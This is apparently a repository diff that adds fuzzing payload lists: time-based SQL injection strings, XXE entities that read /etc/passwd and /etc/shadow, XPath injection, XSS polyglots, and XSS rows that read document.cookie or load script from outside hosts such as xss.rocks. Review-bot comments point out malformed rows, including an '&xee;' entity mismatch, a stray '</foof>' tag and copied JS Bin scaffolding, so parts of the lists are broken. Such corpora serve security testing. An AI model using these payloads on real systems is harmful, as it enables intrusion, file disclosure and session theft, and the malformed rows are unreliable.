+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
|
@ -0,0 +1,18 @@
|
|||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
|
@ -0,0 +1,45 @@
|
|||
and 0=benchmark(3000000,MD5(1))%20/*
|
||||
and 0=benchmark(3000000,MD5(1))%20--
|
||||
and 0=benchmark(3000000,MD5(1))%20%23
|
||||
' and 0=benchmark(3000000,MD5(1))%20/*
|
||||
' and 0=benchmark(3000000,MD5(1))%20--
|
||||
' and 0=benchmark(3000000,MD5(1))%20%23
|
||||
" and 0=benchmark(3000000,MD5(1))%20/*
|
||||
" and 0=benchmark(3000000,MD5(1))%20--
|
||||
" and 0=benchmark(3000000,MD5(1))%20%23
|
||||
) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
) and 0=benchmark(3000000,MD5(1))%20--
|
||||
) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
)) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
)) and 0=benchmark(3000000,MD5(1))%20--
|
||||
)) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
)))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
') and 0=benchmark(3000000,MD5(1))%20/*
|
||||
') and 0=benchmark(3000000,MD5(1))%20--
|
||||
') and 0=benchmark(3000000,MD5(1))%20%23
|
||||
") and 0=benchmark(3000000,MD5(1))%20/*
|
||||
") and 0=benchmark(3000000,MD5(1))%20--
|
||||
") and 0=benchmark(3000000,MD5(1))%20%23
|
||||
')) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
')) and 0=benchmark(3000000,MD5(1))%20--
|
||||
')) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
")) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
")) and 0=benchmark(3000000,MD5(1))%20--
|
||||
")) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
'))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
"))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
')))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20--
|
||||
")))) and 0=benchmark(3000000,MD5(1))%20%23
|
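--- a/attack/xml/xml-attacks.txt
+++ b/attack/xml/xml-attacks.txt
@@ -0,0 +1,66 @@
+-
+' or ''='
+' or '1'='1
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+$
+%
+'XoiZR
+<% Tnn96 %>
+<%= Tnn96 %>
+<? Tnn96 ?>
+<?Tnn96 ?>
+<Tnn96>
+"XoiZR
+(Tnn96)
+*
+*/*
+/
+//
+//*
+:
+;
+@
+@*
+[Tnn96]
+]>
+{{= Tnn96}}
+{{Tnn96}}
+{= Tnn96}
+{Tnn96}
++
+<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini">
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
+<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
+<name>','')); phpinfo(); exit;/*</name>
+0
+0.00005
+0.1
+0.9
+1
+-1
+1.7976931348623157e+308
+5e-10
+5e-324
+count(/child::node())
+false
+null
+true
+x' or 1=1 or 'x'='y
+x' or name()='username' or 'x'='y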
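Review bot: The four unquoted DOCTYPE rows declare the entity `xxe` but reference `&xee;`, so a conforming parser rejects the document for an undefined entity before external-entity handling is ever exercised. A hardening test built on these rows therefore passes even when external entities are still enabled. The `</foof>` closing tag on the CDATA row has the same effect, and the first block of rows still carries CSV quoting (outer `"` and doubled `""`), which makes them non-XML as written. The reference should read `&xxe;`, the tag `</foo>`, and the CSV-escaped duplicates should be unescaped or dropped.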
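--- a/attack/xpath/xpath-injection.txt
+++ b/attack/xpath/xpath-injection.txt
@@ -0,0 +1,13 @@
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
+count(/child::node())
+x' or name()='username' or 'x'='y
+' and count(/*)=1 and '1'='1
+' and count(/@*)=1 and '1'='1
+' and count(/comment())=1 and '1'='1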
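--- a/attack/xss/XSSPolyglot.txt
+++ b/attack/xss/XSSPolyglot.txt
@@ -0,0 +1,32 @@
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+/*-/*`/*\`/*'/*"/**/
+(/* */oNcliCk=alert() )
+//%0D%0A%0D%0A//
+</stYle/</titLe/</teXtarEa/</scRipt/--!>
+\x3csVg/<sVg/oNloAd=alert()//>\x3e
+<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
+<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
+<img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e>
+<a href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</a>
+<math xlink:href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</math>
+<iframe src="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></iframe>
+<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
+<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
+<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
+<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
+var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
+var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
+<script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
+<script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
+</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
+setTimeout(location.search.slice(1));
+jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
+var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.documentElement.innerHTML = data;
+var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.head.outerHTML = data;
+var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.write(data);document.close();
+
+
+
+
+
+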
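Review bot: The row beginning `</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11">` is JS Bin page scaffolding that was copied in with the samples, not a test string. Wherever a row from this list ends up rendered it pulls a script from a third-party host, which does not belong in a test corpus and produces CSP reports unrelated to the application under test. The `setTimeout(location.search.slice(1));` row looks like part of the same demo page rather than an input value. The file also ends in six empty rows, which tools submit as empty values; all of these should be removed so every row is an intended sample.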
70
attack/xss/all-encodings-of-lt.txt
Normal file
70
attack/xss/all-encodings-of-lt.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
<
|
||||
%3C
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
\x3c
|
||||
\x3C
|
||||
\u003c
|
||||
\u003C
|
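--- a/attack/xss/default-javascript-event-attributes.txt
+++ b/attack/xss/default-javascript-event-attributes.txt
@@ -0,0 +1,22 @@
+onAbort
+onBlur
+onChange
+onClick
+onDblClick
+onDragDrop
+onError
+onFocus
+onKeyDown
+onKeyPress
+onKeyUp
+onLoad
+onMouseDown
+onMouseMove
+onMouseOut
+onMouseOver
+onMouseUp
+onMove
+onReset
+onResize
+onSelect
+onSubmit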
164
attack/xss/xss-other.txt
Normal file
164
attack/xss/xss-other.txt
Normal file
|
@ -0,0 +1,164 @@
|
|||
'
|
||||
<font style='color:expression(alert('XSS'))'>
|
||||
' onmouseover=alert(/Black.Spook/)
|
||||
' or 2=2
|
||||
"
|
||||
" or 202
|
||||
";eval(unescape(location))//# %0Aalert(0)
|
||||
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
"><img src=x onerror=prompt(1);>
|
||||
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
alert(1)
|
||||
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||
&#39;&#88;&#83;&#83;&#39;&#41;>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<img src=x:x onerror=alert(1)>
|
||||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
||||
<SCRIPT SRC=//xss.rocks/.j>
|
||||
'); alert('XSS
|
||||
\";alert('XSS');//
|
||||
<%<!--'%><script>alert(1);</script -->
|
||||
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||
<--`<img/src=` onerror=alert(1)> --!>
|
||||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<a href="javascript:\u0061le%72t(1)"><button>
|
||||
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||
<body onLoad="alert('XSS');"
|
||||
<body onunload="javascript:alert('XSS');">
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||
<div onmouseover='alert(1)'>DIV</div>
|
||||
<div/onmouseover='alert(1)'> style="x:">
|
||||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||
<form><button formaction=javascript:alert(1)>CLICKME
|
||||
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
||||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
